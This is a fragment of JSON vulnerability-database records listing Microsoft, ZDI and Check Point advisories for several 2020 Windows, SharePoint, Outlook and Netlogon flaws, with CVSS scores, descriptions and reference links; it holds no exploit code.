"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951"], "modified": "2020-11-19T08:00:00", "id": "MS:CVE-2020-16951", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16951", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16952", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. 
An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.\n\nTo exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.\n\nThe update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Windows TCP/IP Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-15T07:00:00", "id": "MS:CVE-2020-16898", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16898", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:08", "description": "A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. 
An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability and then convince users to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to open an email attachment or click a link in an email or instant message.\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.\n\nThe security update addresses the vulnerability by correcting the way that the Windows GDI handles objects in the memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "GDI+ Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16911"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16911", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16911", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:09", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol ([MS-NRPC](<https://docs.microsoft.com/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>)). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.\n\nTo exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.\n\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.\n\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/kb/4557222>) (updated September 28, 2020).\n\nWhen the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. 
See [Microsoft Technical Security Notifications](<https://technet.microsoft.com/en-us/security/dd252948>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-11T07:00:00", "type": "mscve", "title": "Netlogon Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2020-1472", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:58:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft 3D Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of FBX files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. 
An attacker can leverage this vulnerability to execute code in the context of the current process at low integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "zdi", "title": "Microsoft 3D Viewer FBX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17003"], "modified": "2020-10-14T00:00:00", "id": "ZDI-20-1246", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1246/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows Media Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HEVC streams. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Windows Media Player HEVC Stream Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1257", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1257/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:58:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the WindowsCodecsRaw module. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Windows Camera Codec Pack Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16968"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1258", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the camera codec pack library. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "zdi", "title": "Microsoft Windows Camera Codec Pack Image Processing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967"], "modified": "2020-10-14T00:00:00", "id": "ZDI-20-1245", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1245/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Outlook. User interaction is required to exploit this vulnerability in that the target must open a malicious email or view it in the preview pane. The specific flaw exists within the parsing of HTML content in email. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Outlook HTML Email Heap-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1249", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1249/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:11", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Outlook. User interaction is required to exploit this vulnerability in that the target must open a malicious email or view it in the preview pane. The specific flaw exists within the parsing of HTML content in email. A crafted email can trigger a read before the start of an allocated buffer. 
An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Outlook HTML Email Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1250", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1250/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:36", "description": "A code execution vulnerability exists in Microsoft Windows Media Foundation. The vulnerability is due to improper validation of H265 media files. 
A remote attacker could exploit the vulnerability by enticing a victim user to open a maliciously crafted media file or open the folder containing the file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Media Foundation H265 Stream Parsing Remote Code Execution (CVE-2020-16915)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-13T00:00:00", "id": "CPAI-2020-1004", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:45", "description": "A remote code execution vulnerability exists in Microsoft SharePoint server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-29T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Server Remote Code Execution (CVE-2020-16951)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951"], "modified": "2020-12-29T00:00:00", "id": "CPAI-2020-1367", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:01", "description": "A remote code execution vulnerability exists in Microsoft SharePoint. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Remote Code Execution (CVE-2020-16952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1043", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:38", "description": "A remote code execution vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TCP/IP Remote Code Execution (CVE-2020-16898)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-13T00:00:00", "id": "CPAI-2020-0901", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:36:41", "description": "A privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected. 
Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-04T00:00:00", "type": "checkpoint_advisories", "title": "Winlogon Privilege Escalation (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-06T00:00:00", "id": "CPAI-2020-1095", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:50", "description": "An elevation of privilege vulnerability exists in Microsoft Netlogon. 
Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Netlogon Elevation of Privilege (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2020-0872", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T17:33:54", "description": "# CVE-2020-16947\nOutlook 2019\u00a0Remote Command Execution\nThis bug ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 